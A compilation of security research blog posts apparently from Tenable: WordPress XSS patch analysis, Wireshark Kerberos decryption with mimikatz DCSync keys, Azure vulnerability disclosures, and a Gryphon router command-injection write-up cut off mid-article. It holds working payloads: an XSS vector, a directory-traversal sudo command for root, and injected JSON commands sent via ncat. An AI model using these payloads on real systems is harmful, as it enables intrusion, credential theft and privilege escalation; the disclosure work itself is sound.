Wordpress is an OpenSource software, and its code is available on Github. A Github feature allows us to compare the differences between two branches: 6.0.2 and 6.0.3.

The modifications are not too important and the commits / modifications messages are explicit enough to associate a commit to a fix :

With the following information:

  • Vulnerability name: “Stored XSS in WordPress Core via Comment Editing
  • Commit message: “Comments: Apply kses when editing comments.
  • The modified file: “wp-includes/comment.php

It is understandable that comment editing enables stored XSS in Wordpress.

The default Wordpress installation contains a demo “Hello World” article that also contains a comment:

WordPress default homepage

Simply edit the comment with a user having one of the following privileges :

  • Administrator
  • Editor

Because these are the only privileges that have the necessary “unfiltered_html” capabilities to inject HTML code.

Insert a payload such as “<svg onload=alert(1)>” in the comment :

WordPress comment edition

This executes the payload directly on the page of the article where the comment appeared :

XSS payload Execution

An unauthenticated user can exploit this vulnerability with editor or administrator privileges.
Version 6.0.3 fixes this vulnerability by stripping the payload through “add_filter” function :

Sender’s email address is exposed in wp-mail.php & Stored XSS via wp-mail.php

As for the previously described vulnerability, we can continue to associate commits to vulnerabilities.

To give some context to this vulnerability, you should know that it is possible to post articles on WordPress by email.

The principle is simple: you configure WordPress to access a specific email address via the POP protocol. When a user sends an email to the configured address, WordPress automatically creates an article with the subject of the email as the article title and the body of the email as its content.

This feature doesn’t seem to be used often, at least without an additional plugin. The first step is to configure the “Post by Email” feature in the administration interface :

WordPress “Post via Email” configuration panel

Once configured, it is possible to access the page http://wordpress/wp-mail.php even without authentication. Accessing this page triggers the mail harvesting function and display a summary, which also has the effect of leaking the sender’s email.


Once the harvesting task completes, Wordpress automatically creates posts according to the following conditions:

  • If a user is associated with the sender’s email, the post will be created
    - If the user has the necessary privileges, the post will be automatically published. If not, the post will be pending
  • Otherwise the article is created with the admin user but it remains pending

The payload automatically executes on the page of the article or on the homepage of the blog if the article appears there.

An unauthenticated user can exploit this vulnerability, but it still requires them to know the email used for the publications.

Version 6.0.3 fixes this vulnerability by removing the display of the sender in the “wp-mail.php” page and by not creating the post if it contains a payload.

Wordpress 6.0.3 Patch Analysis was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Decrypt Kerberos/NTLM “encrypted stub data” in Wireshark

I often use Wireshark to analyze Windows and Active Directory network protocols, especially those juicy RPC 😉 But I’m often interrupted in my enthusiasm by the payload dissected as “encrypted stub data”:

Can we decrypt this “encrypted stub data?” 🤔

The answer is: yes, we can! 💪 We can also decrypt Kerberos exchanges, TGTs and service tickets, etc! And same for NTLM/NTLMSSP, as I will show you near the end. Read along to learn how to decrypt DCE/RPC in Wireshark.

Wait, is that magic?

Wireshark is very powerful, as we know, but how can it decrypt data? Actually there’s no magic required because we’ll just give it the keys it needs.

The key depends on the chosen algorithm (RC4, AES128, AES256…) during the Kerberos exchange, and they derive from the password (this is simplified but you didn’t come here to read the Kerberos RFC, right? 🤓).

My preferred method to get the Kerberos keys is to use mimikatz DCSync for the target user:

You’ll directly notice the AES256, AES128, and DES keys at the bottom, but what about the RC4 key? As you may have guessed, it’s simply the NT hash 😉

Just remember that modern Windows environments will likely use AES256 so that’s what we’ll target.

Keep tabs on the keys

Kerberos keys are commonly stored in “keytab” files, especially on Linux systems. By the way, if you find a keytab during a pentest, don’t forget to extract its keys because you’ll be able to create a silver ticket against the service, as I once did (see below ️⬇️️), or access other services with this identity.

Clément Notin on Twitter: "#Pentest success story:1. Steal .keytab file from a Linux server for a webapp using Kerberos authentication🕵️2. Extract Kerberos service encryption key using Create silver ticket using #mimikatz🥝 and pass-the-ticket4. Browse the target5. Profit!😉 / Twitter"

Pentest success story:1. Steal .keytab file from a Linux server for a webapp using Kerberos authentication🕵️2. Extract Kerberos service encryption key using Create silver ticket using #mimikatz🥝 and pass-the-ticket4. Browse the target5. Profit!😉

So it’s no surprise that Wireshark expects its keys in a keytab too. It’s a binary format which can contain several keys, for different encryption algorithms, and potentially for different users.

Wireshark wiki describes how to create the keytab file, using various tools like ktutil. But the one I found the most convenient is, by Dirk-jan @_dirkjan Mollema, who wrote it to decrypt Kerberos in his research on Active Directory forest trusts. I especially like that it doesn’t ask for the cleartext password, just the raw keys, contrary to most other tools.

First, download (you don’t even need the entire repo). Additionally, install impacket if you have not already done so.

Then, open the script and edit lines 112 to 118 and add all the keys you have (in hexadecimal format) with the number corresponding to their type. For example, as we said, most of the time AES256 is used, corresponding to type 18.

The more keys you have, the better 🎉 If you are hesitant, you can even include the RC4 and AES256 keys for the same user. As Dirk-jan comments in the code, you can include the “krbtgt” key, “user” keys (belonging to the client user), “service” keys (belonging to the service user), and even “trust” keys (if you want to decrypt referral tickets in inter-realm Kerberos authentications). You can also add “computer account” keys to decrypt machines’ Kerberos communications (machine accounts in AD are users after all! Just don’t forget the dollar at the end when requesting their keys with DCSync). You don’t need to worry about the corresponding username or domain name in the keytab; it doesn’t matter for Wireshark.

Finally, run the script and pass the output filename as argument:

$ python keytab.kt

Back to Wireshark


Now that you have the keytab, open the Wireshark Preferences window, and under Protocols, look for “KRB5”.

Check “Try to decrypt Kerberos blobs” and Browse to the location of the keytab file you just generated.

Decrypt Kerberos

Now you can try opening some Kerberos exchanges. Everything that is properly decrypted will be highlighted in light blue. Here are a couple examples:

AS-REQ with the decrypted timestamp
AS-REP with the decrypted PAC (containing the user’s privileges, see [MS-PAC])
TGS-REP with its two parts, including the service ticket, both containing the same session key

⚠️ If you notice parts highlighted in yellow it means that the decryption failed. Perhaps the corresponding key is missing in the keytab, or its value for the selected algorithm was not provided (check the “etype” field to see which algorithm is used). For example:

👩‍🎓 Surprise test about Kerberos theory: can you guess whose key I provided here, and whose key is missing?

Answer: We observe that Wireshark can decrypt the first part which is the TGT encrypted with the KDC key, but it cannot decrypt the second part which is encrypted with the client’s key. Therefore, here the keytab only contains the krbtgt key.

Decrypt DCE/RPC, LDAP…

Do you remember how this all began? I wanted to decrypt DCERPC payloads, not the Kerberos protocol itself!

And… it works too! 💥

Quick reminder first, the same color rule applies: blue means that decryption is ok, and yellow means errors. If you see some yellow during the authentication phase of the protocol (here the Bind step) the rest will certainly cannot be decrypted:

Here are some examples where it works, notice how the “encrypted stub data” is now replaced with “decrypted stub data” 🏆

It also works with other protocols, like LDAP:

workstation checking if its LAPS password is expired, and thus due for renewal

Tip to refresh the keytab

A modified keytab file does not take effect immediately in Wireshark. Either you have to open the Preferences, disable Kerberos decryption, confirm, then re-open it to re-enable it, which is slow and annoying… Or the fastest I’ve found is to save the capture, close Wireshark and re-open the capture file.

NTLM decryption

What about NTLM? Can we do the same decryption if NTLMSSP authentication is used? The answer is yes! 🙂

In the Preferences, scroll to the “NTLMSSP” protocol, and type the cleartext password in the “NT Password” field. This is described in the Wireshark NTLMSSP wiki page where I have added some examples. Some limitations contrary to Kerberos: you need the cleartext password and it must be ASCII only (this limitation is mentioned in the source code) so it is not applicable to machine account passwords, and you can only provide one at a time, contrary to the keytab which can hold keys for several users.

Update: actually, it is possible to decrypt using NTLM hash(es)! This feature is not documented, and not possible through the UI, but by looking at the code we can see that it is indeed possible as described in this CTF writeup: Insomni’Hack Teaser 2023 — Autopsy.
How to provide the NT hash(es)? Using a keytab too! It’s a bit confusing to use a Kerberos option to decrypt NTLMSSP but it works. If you remember earlier, I said that the RC4 key to put in a keytab is identical to the NT hash. So, you have to create a keytab entry, as explained previously, using the RC4-HMAC type (etype 23) and with the NT hash. Enable it in the Wireshark KRB5 options, same as before, and your NTLM encrypted trafic will be in clear-text if the hash is correct.


I hope these tips will help you in your journey to examine “encrypted stub data” payloads using Wireshark. This is something that we often do at Tenable when doing research on Active Directory, and I hope it will benefit you too!

Protocols become increasingly encrypted by default, which is a very good thing… Therefore, packet capture analysis, without decryption capabilities, will become less and less useful, and I’m thankful to see those tools including such features. Do you know other protocols that Wireshark can decrypt? Or perhaps with other tools?

Decrypt Kerberos/NTLM “encrypted stub data” in Wireshark was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Extracting Ghidra Decompiler Output with Python

28 July 2022 at 13:03

Ghidra’s decompiler, while not perfect, is pretty darn handy. Ghidra’s user interface, however, leaves a lot to be desired. I often find myself wishing there was a way to extract all the decompiler output to be able to explore it a bit easier in a text editor or at least run other tools against it.

At the time of this writing, there is no built-in functionality to export decompiler output from Ghidra. There are a handful of community made scripts available that get the job done (such as Haruspex and ExportToX64dbg), but none of these tools are as flexible as I’d like. For one, Ghidra’s scripting interface is not the easiest to work with. And two, resorting to Java or the limitations of Jython just doesn’t cut it. Essentially, I want to be able to access Ghidra’s scripting engine and API while retaining the power and flexibility of a local, fully-featured Python3 environment.

This blog will walk you through setting up a Ghidra to Python bridge and running an example script to export Ghidra’s decompiler output.

Prepping Ghidra

First and foremost, make sure you have a working installation of Ghidra on your system. Official downloads can be obtained from

Next, you’ll want to download and install the Ghidra to Python Bridge. Steps for setting up the bridge are demonstrated below, but it is recommended to follow the official installation guide in the event that the Ghidra Bridge project changes over time and breaks these instructions.

The Ghidra to Python bridge is a local Python RPC proxy that allows you to access Ghidra objects from outside the application. A word of caution here: Using this bridge is essentially allowing arbitrary code execution on your machine. Be sure to shutdown the bridge when not in use.

In your preferred python environment, install the ghidra bridge:

$ pip install ghidra_bridge

Create a directory on your system to store Ghidra scripts in. In this example, we’ll create and use “~/ghidra_scripts.”

$ mkdir ~/ghidra_scripts

Launch Ghidra and create a new project. Create a Code Browser window (click the dragon icon in the tool chest bar) and open the Script Manager window. This can be opened by selecting “Window > Script Manager.” Press the “Manage Script Directories” in the Script Manager’s toolbar.

In the window that pops up, add and enable “$USER_HOME/ghidra_scripts” to the list of script directories.

Back in your terminal or python environment, run the Ghidra Bridge installation process.

$ python -m ghidra_bridge.install_server ~/ghidra_scripts

This will automatically copy over the scripts necessary for your system to run the Ghidra Bridge.

Finally, back in Ghidra, click the “Refresh Script List” button in the toolbar and filter the results to “bridge.”. Check the boxes next to “In Toolbar” for the Server Start and Server Shutdown scripts as pictured below. This will allow you to access the bridge’s start/stop commands from the Tools menu item.

Go ahead and start the bridge by selecting “Run in Background.” If all goes according to plan, you should see monitor output in the console window at the bottom of the window similar to the following:

Using the Ghidra Bridge

Now that you’ve got the full power and flexibility of Python, let’s put it to some good use. As mentioned earlier, the example use-case being provided in this blog is the export of Ghidra’s decompiler output.

Source code for this example is available here:

We’ll be using an extremely simple application to demonstrate this script’s functionality, which is available in the “example” folder of the “extract_decomps” directory. All the application does is grab some input from the user and say hello.

Build and run the test application.

$ gcc test.c
$ ./a.out
What is your name?
# dino
Hello, dino!

Import the test binary into Ghidra and run an auto-analysis on it. Once complete, simply run the extraction script.

$ python
INFO:root:Program Name: a.out
INFO:root:Creation Date: Tue Jul 26 13:51:21 EDT 2022
INFO:root:Language ID: AARCH64:LE:64:AppleSilicon
INFO:root:Compiler Spec ID: default
INFO:root:Using 'a.out_extraction' as output directory…
INFO:root:Extracting decompiled functions…
INFO:root:Extracted 7 out of 7 functions
$ tree a.out_extraction
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

From here, you’re free to browse the source code in the text editor or IDE of your choice and run any other tools you see fit against this output. Please keep in mind, however, that the decompiler output from Ghidra is intended as pseudo code and won’t necessarily conform to the syntax expected by many static analysis tools.

Extracting Ghidra Decompiler Output with Python was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Logging Passwords in Plaintext in Azure Arc

19 July 2022 at 13:03

Microsoft’s Azure Arc is a management platform designed to bridge multi-cloud and similarly mixed environments together in a convenient way.

Tenable Research has discovered that the Jumpstart environments for Arc do not properly use logging utilities common amongst other Azure services. This leads to potentially sensitive information, such as service principal credentials and Arc database credentials, being logged in plaintext. The log files that these credentials are stored in are accessible by any user on the system. Based on this finding, it may be possible that other services are also affected by a similar issue.

Microsoft has patched this issue and updated their documentation to warn users of credential reuse within the Jumpstart environment. Tenable’s advisory can be found here. No bounty was provided for this finding.

The Flaw

The testing environment this issue was discovered in is the ArcBox Fullbox Jumpstart environment. No additional configurations are necessary beyond the defaults.

When ArcBox-Client provisions during first-boot, it runs a PowerShell script that is sent to it via the `Microsoft.Compute.CustomScriptExtension (version 1.10.12) plugin.

Most scripts we’ve come across on other services tend to write ***REDACTED*** in place of anything sensitive when writing to a log file. For example:

<Plugin name="Microsoft.CPlat.Core.RunCommandLinux" version="1.0.3">
<RuntimeSettings seqNo="0">{
"runtimeSettings": [
"handlerSettings": {
"protectedSettingsCertThumbprint": "7AF139E055555FAKEINFO555558EC374DAD46370",
"protectedSettings": "*** REDACTED ***",
"publicSettings": {}

In the provisioning script for this host, however, this sanitizing is not done. For example, in “C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.12\Status\0.status”, our secrets and credentials are plainly visible to everyone, including low privileged users.

This allows a malicious actor to disclose potentially sensitive information if they were to gain access to this machine. The accounts revealed could allow the attacker to further compromise a customer’s Azure environment if these credentials or accounts are re-used elsewhere.


Obviously, the Arc Jumpstart environment is intended to be used as a demo environment, which ideally lessens the impact of the revealed credentials — provided that users haven’t reused the service principal elsewhere in their environment. That said, it isn’t uncommon for customers to use these types of Jumpstart environments as a starting point to build out their actual production infrastructure.

We do, however, feel it’s worth being aware of this issue in the event that other logging mechanisms exist elsewhere in the Azure ecosystem, which could have more dire consequences if present in a production environment.

Logging Passwords in Plaintext in Azure Arc was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Site Recovery DLL Hijacking

12 July 2022 at 16:58

Azure Site Recovery is a suite of tools aimed at providing disaster recovery services for cloud resources. It provides utilities for replication, data recovery, and failover services during outages.

Tenable Research has discovered that this service is vulnerable to a DLL hijacking attack due to incorrect directory permissions. This allows any low-privileged user to escalate to SYSTEM level privileges on hosts where this service is installed.

Microsoft has assigned this issue CVE-2022–33675 and rated it a severity of Important with a CVSSv3 score 7.8. Tenable’s advisory can be found here. Microsoft’s post regarding this issue can be found here. Additionally, Microsoft is expected to award a $10,000 bug bounty for this finding.

The Flaw

The cxprocessserver service runs automatically and with SYSTEM level privileges. This is the primary service for Azure Site Recovery.

Incorrect permissions on the service’s executable directory (“E:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\transport\”) allow new files to be created by normal users. Please note that while the basic permissions show that “write” access is disabled, the “Special Permissions” still incorrectly grant write access to this directory. This can be verified by viewing the “Effective Access” granted to a given user for the directory in question, as demonstrated in the following screenshot.

This permissions snafu allows for a DLL hijacking/planting attack via several libraries used by the service binary.

Proof of Concept

For brevity, we’ve chosen to leave full exploitation steps out of this post since DLL hijacking techniques are extremely well documented elsewhere.

A malicious DLL was created to demonstrate the successful hijack via procmon.

Under normal circumstances, the loading of ktmw32.dll looks like the following:

With our planted DLL, the following can be observed:

This allows an attacker to elevate from an arbitrary, low-privileged user to SYSTEM. During the disclosure process, Microsoft confirmed this behavior and has created patches accordingly.


DLL hijacking is quite an antiquated technique that we don’t often come across these days. When we do, impact is often quite limited due to lack of security boundaries being crossed. MSRC lists several examples in their blog post discussing how they triage issues that make use of this technique.

In this case, however, we were able to cross a clear security boundary and demonstrated the ability to escalate a user to SYSTEM level permissions, which shows the growing trend of even dated techniques finding a new home in the cloud space due to added complexities in these sorts of environments.

As this vulnerability was discovered in an application used for disaster recovery, we are reminded that had this been discovered by malicious actors, most notably ransomware groups, the impact could have been much wider reaching. Ransomware groups have been known to target backup files and servers to ensure that a victim is forced into paying their ransom and unable to restore from clean backups. We strongly recommend applying the Microsoft supplied patches as soon as possible to ensure your existing deployments are properly secured. Microsoft has taken action to correct this issue, so any new deployments should not be affected by this flaw.

Microsoft Azure Site Recovery DLL Hijacking was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Synapse Pwnalytics

13 June 2022 at 12:42

Synapse Analytics is a platform used for machine learning, data aggregation, and other such computational work. One of the primary developer-oriented features of this platform is the use of Jupyter notebooks. These are essentially blocks of code that can be run independently of one another in order to analyze different subsets of data.

Synapse Analytics is currently listed under Microsoft’s high-impact scenarios in the Azure Bug Bounty program. Microsoft states that products and scenarios listed under that heading have the highest potential impact to customer security.

Synapse Analytics utilizes Apache Spark for the underlying provisioning of clusters that user code is run on. User code in these environments is run with intentionally limited privileges because the environments are managed by internal Microsoft subscription IDs, which is generally indicative of a multi-tenant environment.

Tenable Research has discovered a privilege escalation flaw that allows a user to escalate privileges to that of the root user within the context of a Spark VM. We have also discovered a flaw that allows a user to poison the hosts file on all nodes in their Spark pool, which allows one to redirect subsets of traffic and snoop on services users generally do not have access to. The full privilege escalation flaw has been adequately addressed. However, the hosts file poisoning flaw remains unpatched at the time of this writing.

Many of the keys, secrets, and services accessible via these attacks have traditionally allowed further lateral movement and potential compromise of Microsoft-owned infrastructure, which could lead to a compromise of other customers’ data as we’ve seen in several other cases recently, such as Wiz’s ChaosDB or Orca’s AutoWarp. For Synapse Analytics, however, access by a root user is limited to their own Spark pool. Access to resources outside of this pool would require additional vulnerabilities to be chained and exploited. While Tenable remains skeptical that cross-tenant access is not possible with the elevated level of access gained by exploitation of these flaws, the Synapse engineering team has assured us that such a feat is not possible.

Tenable has rated this issue as Critical severity based on the context of the Spark VM itself. Microsoft considers this issue a Low severity defense-in-depth improvement based on the context of the Synapse Analytics environment as a whole. Microsoft states that cross-tenant impact of this issue is unlikely, if not impossible, based on this vulnerability alone.

We’ll get to the technical bits soon, but let’s first address some disclosure woes. When it comes to Synapse Analytics, Microsoft Security Response Center (MSRC) and the development team behind Synapse seem to have a major communications disconnect. It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via emails and the researcher portal, it wasn’t until we reached out via Twitter that we would receive responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently and no notification was provided to Tenable. We had to discover this information for ourselves.

During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. Their team stated the following (typos are Microsoft’s): “[W]e do not consider this to be a important severity security issue but rather a better practice.” If that were the case, why can snippets like the following be found throughout the Spark VMs?

It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occuring.

Unfortunately, communication errors and the downplaying of security issues in their products and cloud offerings is far from uncommon behavior for MSRC as of late. For a few more recent examples where MSRC has failed to adequately triage findings and has acted in bad faith towards researchers, check out the following research articles:

The Flaws

Privilege Escalation

The Jupyter notebook functionality of Synapse runs as a user called “trusted-service-user” within an Apache Spark cluster. These compute resources are provisioned to a specific Azure tenant, but are managed internally by Microsoft. This can be verified by viewing the subscription ID of the nodes on the cluster (only visible with elevated privileges and the Azure metadata service). This is indicative of a multi-tenant environment.

Not our subscription ID

This “trusted-service-user” has limited access to many of the resources on the host and is intentionally unable to interact with “waagent,” the Azure metadata service, the Azure WireServer service, and many other services only intended to be accessed by the root user and other special accounts end-users do not normally have access to.

That said, the trusted-service-user does have sudo access to a utility that is used to mount file shares from other Azure services:

The above screenshot shows that the Jupyter notebook code is running as the “trusted-service-user” account and that it has sudo access to run a particular script without requiring a password.

The script happens to contain a handful of flaws that, when combined, can be used to escalate privileges to root. The full text has been omitted from this section for brevity, but relevant bits are highlighted below.

# NodeAgent installation script.
# Maintained by [email protected].
# Copyright © Microsoft Corporation. All rights reserved.
# this script use cifs to mount fileshare, will be deprecated once we implement fuse driver to mount fileshare
SCRIPT_DIR=”$( cd “$( dirname “${BASH_SOURCE[0]}” )” >/dev/null 2>&1 && pwd )”
source ${SCRIPT_DIR}/

First and foremost, this script is clearly temporary and has likely not undergone strict review as indicated by the deprecation warning. Additionally, it appears that several functions are sourced from a “” file in the same directory.

The functions provided by “” are used for sanity checks throughout the main script. For example, the following is used to determine if a given mount point is valid before attempting to unmount it:

if [ “$commandtype” = “unmount” ]; then
check_if_is_valid_mount_point_before_unmount $args
umount $args
rm -rf $args
exit 0

Moving on, the end of the main script is where we find the good stuff:

uid=$(id -u ${TRUSTED_SERVICE_USER})
gid=$(id -g ${TRUSTED_SERVICE_USER})
mount -t cifs //”$account””$fileshare” “$mountPoint” -o vers=3.0,uid=$uid,gid=$gid,username=”$account”,password=”$accountKey”,serverino
if [ “$?” -ne “0” ]; then
check_if_deletable_folder “$mountPoint”
rm -rf “$mountPoint”
exit 1

Another of the check functions from is used above, but this time the check is keyed off successfully running the mount command a few lines earlier. If the mount command fails, the mount point is deleted. By providing a mount point that passes all sanity checks to this point and that has invalid file share credentials, we can trigger the “rm” command in the above snippet. Let’s use it to get rid of the file, and thus, all of the sanity check functions.

Full command used for file deletion:

sudo -u root /usr/lib/notebookutils/bin/ mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/ source:https://[email protected] accountKey:invalid 2>&1

The file only checks that the mountPoint begins with “/synfs” before determining that it is valid. This allows a simple directory traversal attack to bypass that function.

Now we can bypass all checks from, remove the existing utility, and mount our own in the same directory, which still has sudo access. We created a test share using the Gen2 Storage service within Azure. We created a file in this share called “” with the contents being “id”. This allows us to demonstrate the execution privileges now granted to us.

Our mount command looks like this:

sudo -u root /usr/lib/notebookutils/bin/ mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/ source:https://[email protected] accountKey:REDACTED 2>&1

Let’s check our access now:

Hosts File Poisoning

There exists a service on one of the hosts in each Spark pool called “HostResolver.” To be specific, it can be found at “/opt/microsoft/Microsoft.Analytics.Clusters.Services.HostResolver.dll” on each of the nodes in the Synapse environment. This service is used to manage the “hosts” file for all hosts in the Spark cluster. This supports ease-of-management — administrators can send commands to each host by a preset hostname, rather than keeping track of IP addresses, which can change based on the scaling features of the pool.

Due to the lack of any authentication features, a low-privileged user is able to overwrite the “hosts” file on all nodes in their Spark pool, which allows them to snoop on services and traffic they otherwise are not intended to be able to see. To be clear, this isn’t any sort of game-changing vulnerability or of any real significance on its own. We do believe, however, that this flaw warrants a patch due to its potential as a critical piece of a greater exploit chain. It’s also just kinda fun and interesting.

For example, here’s a view of the information used by each host:


The hostresolver can be queried like this:

What happens when a new host is added to the pool? Well, a register request is sent to the hostresolver, which parses the request, and then sends out an update to all other hosts in the pool to update their hosts file. If the entry already exists, it is overwritten.

This register request looks like this:

The updated hosts file looks like this:

This change is propagated to all hosts in the pool. As there is no authentication to this service, we can arbitrarily modify the hosts file on all nodes by manually submitting register requests. If these hosts were provisioned under our subscription ID in Azure, this wouldn’t be an issue since we’d already have full control of them. Since we don’t actually own these hosts, however, this is a slightly bigger problem.

When we originally reported this issue, communicating to hosts outside of one’s own Spark pool was possible. We assume that was a separate issue as it was fixed during the course of our own research and not publicly disclosed by Microsoft. This new inability to communicate outside of our own pool severely limits the impact of this flaw by itself, now requiring other flaws in order to achieve greater impact. At the time of this writing, the hosts file poisoning flaw remains unpatched.

Key Takeaways

Patching in cloud environments is largely out of end-users’ control. Customers are entirely beholden to the cloud providers to fix reported issues. The good news is that once an issue is fixed, it’s fixed. Customers generally don’t have any actions to take since everything happens behind the scenes.

The bad news, however, is that the cloud providers rarely provide notice that a security-related flaw was ever present in the first place. Cloud vulnerabilities rarely receive CVEs because they aren’t static products. They are ever-changing beasts with no accountability requirements in terms of notifying users and customers of security-related changes.

It doesn’t matter how good any given vendor’s software supply chain is if there are parts of the process or product that don’t rely on it. For example, the script (and other scripts discovered on these hosts) have very clear deprecation warnings in them and don’t appear to be required to go through the normal QA channels. Chances are this was a temporary script to enable necessary functionality with the intention of replacing it sometime down the line, but that sometime never arrived and it became a fairly critical component, which is a situation any software engineer is all too familiar with.

Additionally, because these environments are so volatile, it makes it difficult for security researchers to accurately gauge the impact of their findings because of strict Rules of Engagement and changes happening over the course of one’s research.

For example, in the hosts file poisoning vulnerability discussed in this blog, we noticed that we were able to change the hosts files in pools outside of our own, but this was fixed at some point during the disclosure process by introducing more robust firewalling rules at the node-level. We also noticed many changes happening with certain features of the service throughout our research, which we now know was the doing of the good folks at Orca Security during their SynLapse research.

On a final note, while we respect the efforts of researchers that go the extra mile to compromise customer data and internal vendor secrets, we believe it’s in everyone’s best interest to adhere to the rules set forth by each of the cloud vendors. Since there are so many moving pieces in these environments and likely many configurations outsiders are not privy to, violating these rules of engagement could have unintended consequences we’d rather not be responsible for. This does, however, introduce a sort of Catch-22 for researchers where the vendor can claim that a disclosure report does not adequately demonstrate impact, but also claim that a researcher has violated the rules of engagement if they do take the extra steps to do so.

For more information regarding these issues and their disclosure timelines, please see the following Tenable Research Advisories:

Microsoft Azure Synapse Pwnalytics was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵


In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.


Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = “/sbin/ “ .. “\”” .. ssid .. “\”” .. “ “ .. “\”” .. key .. “\”” .. “ “ .. “\”” .. hidden .. “\”” .. “ “ .. “\”” .. ssid5 .. “\”” .. “ “ .. “\”” .. key5 .. “\”” .. “ “ .. “\”” .. mssid .. “\”” .. “ “ .. “\”” .. mkey .. “\”” .. “ “ .. “\”” .. gssid .. “\”” .. “ “ .. “\”” .. gkey .. “\”” .. “ “ .. “\”” .. ghidden .. “\”” .. “ “ .. “\”” .. country .. “\”” .. “ “ .. “\”” .. bssid .. “\”” .. “ “ .. “\”” .. board .. “\”” .. “ “ .. “\”” .. wpa .. “\””
os.execute(“touch /etc/rc_in_progress.txt”)
os.execute(“/sbin/ 2 &”)
luci.http.write(“{\”rc\”: \”OK\”}”)

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, stringing together commands using wget to grab a python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format : {“<operationNumber>” : {“<op parameter 1>”:”param 1 value”, …}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of “;id>/tmp/op41” would result in the output of the id command being output to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {“41”:{“cmd”:”;id>/tmp/op41”}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo ‘{“41”:{“cmd”:”;id>/tmp/op41"}}’ | ncat — ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

